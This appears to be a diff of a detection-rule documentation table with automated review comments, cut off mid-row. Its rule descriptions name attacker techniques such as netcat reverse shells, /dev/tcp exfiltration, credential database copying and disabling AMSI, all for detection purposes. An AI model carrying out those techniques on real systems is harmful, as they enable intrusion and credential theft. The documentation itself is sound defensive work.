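Review bot: replacing [Tactic: Privilege Escalation] with [Tactic: Lateral Movement] on "Local Account TokenFilter Policy Disabled" is a re-mapping, not just the 5-to-6 version bump, and the description was left untouched. The behaviour it describes (remote connections from local Administrators members receiving full high-integrity tokens) does fit lateral movement, but the release summary should list the tactic change explicitly so users who filter dashboards or exception lists by tactic notice that the rule moved. The other two rows in the hunk (privileged-group add 3 to 4, PID 1 GDB dump 1 to 2) change nothing visible and are fine.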
@@ -792,6 +804,16 @@ and their rule type is `machine_learning`. |<<macos-installer-package-spawns-network-event, MacOS Installer Package Spawns Network Event>> |Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 +|<<machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain, Machine Learning Detected DGA activity using a known SUNBURST DNS domain>> |A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. |[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain, Machine Learning Detected a DNS Request Predicted to be a DGA Domain>> |A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. 
|[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-dns-request-with-a-high-dga-probability-score, Machine Learning Detected a DNS Request With a High DGA Probability Score>> |A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. |[Domain: Network], [Domain: Endpoint], [Data Source: Elastic Defend], [Use Case: Domain Generation Algorithm Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Command and Control] |8.9.0 |1 + +|<<machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity, Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity>> |A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. |[OS: Windows], [Data Source: Elastic Endgame], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + +|<<machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score, Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score>> |A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. 
|[OS: Windows], [Data Source: Elastic Endgame], [Use Case: Living off the Land Attack Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Defense Evasion] |8.9.0 |1 + |<<malicious-remote-file-creation, Malicious Remote File Creation>> |Malicious remote file creation, which can be an indicator of lateral movement activity. |[Domain: Endpoint], [Use Case: Lateral Movement Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.9.0 |1 |<<malware-detected-elastic-endgame, Malware - Detected - Elastic Endgame>> |Elastic Endgame detected Malware. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |101 
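Review bot: the two ProblemChild rows ("...Predicted to be Malicious Activity" and "...with a High Malicious Probability Score") carry word-for-word identical descriptions, so this table gives the reader no way to tell which rule fires on the classifier's prediction and which on the probability threshold; the DGA pair in the same hunk already makes that distinction ("predicted to be the result of" versus "with a high probability of sourcing from"), and the ProblemChild descriptions should be split the same way in the rule source. Two smaller points in the added rows: the SUNBURST description reads "a DNS question name that used by the SUNBURST malware" (missing "is"), and every new row tags both [Rule Type: ML] and [Rule Type: Machine Learning], which looks like a tag rename that left the old value behind and should be reduced to one.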
@@ -800,6 +822,8 @@ and their rule type is `machine_learning`. |<<masquerading-space-after-filename, Masquerading Space After Filename>> |This rules identifies a process created from an executable with a space appended to the end of the filename. This may indicate an attempt to masquerade a malicious file as benign to gain user execution. When a space is added to the end of certain files, the OS will execute the file according to it's true filetype instead of it's extension. Adversaries can hide a program's true filetype by changing the extension of the file. They can then add a space to the end of the name so that the OS automatically executes the file when it's double-clicked. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 +|<<memory-dump-file-with-unusual-extension, Memory Dump File with Unusual Extension>> |Identifies the creation of a memory dump file with an unusual extension, which can indicate an attempt to disguise a memory dump as another file type to bypass security defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 + |<<microsoft-365-exchange-anti-phish-policy-deletion, Microsoft 365 Exchange Anti-Phish Policy Deletion>> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 |<<microsoft-365-exchange-anti-phish-rule-modification, Microsoft 365 Exchange Anti-Phish Rule Modification>> |Identifies the modification of an anti-phishing rule in Microsoft 365. 
By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 
@@ -842,53 +866,53 @@ and their rule type is `machine_learning`. |<<microsoft-365-user-restricted-from-sending-email, Microsoft 365 User Restricted from Sending Email>> |Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.3.0 |102 -|<<microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> |An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |206 +|<<microsoft-build-engine-started-an-unusual-process, Microsoft Build Engine Started an Unusual Process>> |An instance of MSBuild, the Microsoft Build Engine, started a PowerShell script or the Visual C# Command Line Compiler. This technique is sometimes used to deploy a malicious payload using the Build Engine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |207 -|<<microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |205 +|<<microsoft-build-engine-started-by-a-script-process, Microsoft Build Engine Started by a Script Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |206 |<<microsoft-build-engine-started-by-a-system-process, Microsoft Build Engine Started by a System Process>> |An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<microsoft-build-engine-started-by-an-office-application, Microsoft Build Engine Started by an Office Application>> |An instance of MSBuild, the Microsoft Build Engine, was started by Excel or Word. This is unusual behavior for the Build Engine and could have been caused by an Excel or Word document executing a malicious script payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 +|<<microsoft-build-engine-using-an-alternate-name, Microsoft Build Engine Using an Alternate Name>> |An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |109 -|<<microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-server-um-spawning-suspicious-processes, Microsoft Exchange Server UM Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 -|<<microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> |Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. 
This activity has been observed exploiting CVE-2021-26858. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-server-um-writing-suspicious-files, Microsoft Exchange Server UM Writing Suspicious Files>> |Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 |<<microsoft-exchange-transport-agent-install-script, Microsoft Exchange Transport Agent Install Script>> |Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 -|<<microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<microsoft-exchange-worker-spawning-suspicious-processes, Microsoft Exchange Worker Spawning Suspicious Processes>> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). 
This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<microsoft-iis-connection-strings-decryption, Microsoft IIS Connection Strings Decryption>> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<microsoft-iis-service-account-password-dumped, Microsoft IIS Service Account Password Dumped>> |Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> |Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<microsoft-windows-defender-tampering, Microsoft Windows Defender Tampering>> |Identifies when one or more features on Microsoft Defender are disabled. 
Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<mimikatz-memssp-log-file-detected, Mimikatz Memssp Log File Detected>> |Identifies the password log file from the default Mimikatz memssp module. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> |Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<modification-of-amsienable-registry-key, Modification of AmsiEnable Registry Key>> |Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<modification-of-boot-configuration, Modification of Boot Configuration>> |Identifies use of bcdedit.exe to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> |Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<modification-of-dynamic-linker-preload-shared-object, Modification of Dynamic Linker Preload Shared Object>> |Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |207 |<<modification-of-dynamic-linker-preload-shared-object-inside-a-container, Modification of Dynamic Linker Preload Shared Object Inside A Container>> |This rule detects the creation or modification of the dynamic linker preload shared object (ld.so.preload) inside a container. The Linux dynamic linker is used to load libraries needed by a program at runtime. Adversaries may hijack the dynamic linker by modifying the /etc/ld.so.preload file to point to malicious libraries. This behavior can be used to grant unauthorized access to system resources and has been used to evade detection of malicious processes in container environments. 
|[Data Source: Elastic Defend for Containers], [Domain: Container], [Tactic: Defense Evasion] |8.8.0 |1 |<<modification-of-environment-variable-via-launchctl, Modification of Environment Variable via Launchctl>> |Identifies modifications to an environment variable using the built-in launchctl command. Adversaries may execute their own malicious payloads by hijacking certain environment variables to load arbitrary libraries or bypass certain restrictions. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<modification-of-openssh-binaries, Modification of OpenSSH Binaries>> |Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<modification-of-openssh-binaries, Modification of OpenSSH Binaries>> |Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<modification-of-safari-settings-via-defaults-command, Modification of Safari Settings via Defaults Command>> |Identifies changes to the Safari configuration using the built-in defaults command. Adversaries may attempt to enable or disable certain Safari settings, such as enabling JavaScript from Apple Events to ease in the hijacking of the users browser. 
|[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> |Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<modification-of-standard-authentication-module-or-configuration, Modification of Standard Authentication Module or Configuration>> |Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend] |8.6.0 |204 |<<modification-of-wdigest-security-provider, Modification of WDigest Security Provider>> |Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> |Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Data Source: Active Directory], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring] |8.3.0 |6 +|<<modification-of-the-mspkiaccountcredentials, Modification of the msPKIAccountCredentials>> |Identify the modification of the msPKIAccountCredentials attribute in an Active Directory User Object. Attackers can abuse the credentials roaming feature to overwrite an arbitrary file for privilege escalation. ms-PKI-AccountCredentials contains binary large objects (BLOBs) of encrypted credential objects from the credential manager store, private keys, certificates, and certificate requests. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Data Source: Active Directory], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring] |8.3.0 |7 -|<<modification-or-removal-of-an-okta-application-sign-on-policy, Modification or Removal of an Okta Application Sign-On Policy>> |Detects attempts to modify or delete a sign on policy for an Okta application. An adversary may attempt to modify or delete the sign on policy for an Okta application in order to remove or weaken an organization's security controls. 
|[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<modification-or-removal-of-an-okta-application-sign-on-policy, Modification or Removal of an Okta Application Sign-On Policy>> |Detects attempts to modify or delete a sign on policy for an Okta application. An adversary may attempt to modify or delete the sign on policy for an Okta application in order to remove or weaken an organization's security controls. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 |<<mofcomp-activity, Mofcomp Activity>> |Managed Object Format (MOF) files can be compiled locally or remotely through mofcomp.exe. Attackers may leverage MOF files to build their own namespaces and classes into the Windows Management Instrumentation (WMI) repository, or establish persistence using WMI Event Subscription. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 
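Review bot: The minimum stack version moves from 8.3.0 to 8.6.0 for "Modification of Dynamic Linker Preload Shared Object" (106 -> 207) and "Modification of Standard Authentication Module or Configuration" (104 -> 204), and to 8.10.0 for "Modification or Removal of an Okta Application Sign-On Policy" (105 -> 206), while the descriptions and tags on those rows are unchanged; because that column decides which deployments receive the update, the 8.10.5 summary should state that stacks below the new minimum keep the previous rule version. Separately, the msPKIAccountCredentials row still opens with "Identify the modification of the msPKIAccountCredentials attribute" on both its `-` and `+` lines, where every other row reads "Identifies ..."; this text is regenerated from the rule's description field, so correcting it at the rule source will carry the fix into this table.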
@@ -916,15 +940,17 @@ and their rule type is `machine_learning`. |<<my-first-rule, My First Rule>> |This rule helps you test and practice using alerts with Elastic Security as you get set up. It’s not a sign of threat activity. |[Use Case: Guided Onboarding], [Data Source: APM], [OS: Windows], [Data Source: Elastic Endgame] |8.7.0 |2 -|<<ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> |Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<ntds-or-sam-database-file-copied, NTDS or SAM Database File Copied>> |Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> |Identifies suspicious usage of unshare to manipulate system namespaces. Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 +|<<namespace-manipulation-using-unshare, Namespace Manipulation Using Unshare>> |Identifies suspicious usage of unshare to manipulate system namespaces. 
Unshare can be utilized to escalate privileges or escape container security boundaries. Threat actors have utilized this binary to allow themselves to escape to the host and access other resources or escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |7 |<<netcat-listener-established-inside-a-container, Netcat Listener Established Inside A Container>> |This rule detects an established netcat listener running inside a container. Netcat is a utility used for reading and writing data across network connections, and it can be used for malicious purposes such as establishing a backdoor for persistence or exfiltrating data. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 +|<<netcat-listener-established-via-rlwrap, Netcat Listener Established via rlwrap>> |Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 + |<<netsh-helper-dll, Netsh Helper DLL>> |Identifies the addition of a Netsh Helper DLL, netsh.exe supports the addition of these DLLs to extend its functionality. Attackers may abuse this mechanism to execute malicious payloads every time the utility is executed, which can be done by administrators or a scheduled task. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<network-activity-detected-via-cat, Network Activity Detected via cat>> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<network-activity-detected-via-cat, Network Activity Detected via cat>> |This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 |<<network-connection-via-certutil, Network Connection via Certutil>> |Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 
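Review bot: The "Network Activity Detected via cat" row is bumped from 1 to 2 but keeps the misspelling "Cat is capable of transfering data via tcp/udp channels" on both the `-` and `+` lines; since the version is already changing, this is the release to fix "transferring" (and the lowercase "tcp/udp") in the rule's description so the regenerated row is clean. The new "Netcat Listener Established via rlwrap" row (8.3.0, version 1) carries only [Tactic: Execution], which matches the neighbouring "Netcat Listener Established Inside A Container" row and needs no change.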
@@ -932,33 +958,33 @@ and their rule type is `machine_learning`. |<<network-connection-via-msxsl, Network Connection via MsXsl>> |Identifies msxsl.exe making a network connection. This may indicate adversarial activity as msxsl.exe is often leveraged by adversaries to execute malicious scripts and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<network-connection-via-recently-compiled-executable, Network Connection via Recently Compiled Executable>> |This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<network-connection-via-registration-utility, Network Connection via Registration Utility>> |Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<network-connection-via-registration-utility, Network Connection via Registration Utility>> |Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<network-connection-via-signed-binary, Network Connection via Signed Binary>> |Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<network-connection-via-signed-binary, Network Connection via Signed Binary>> |Binaries signed with trusted digital certificates can 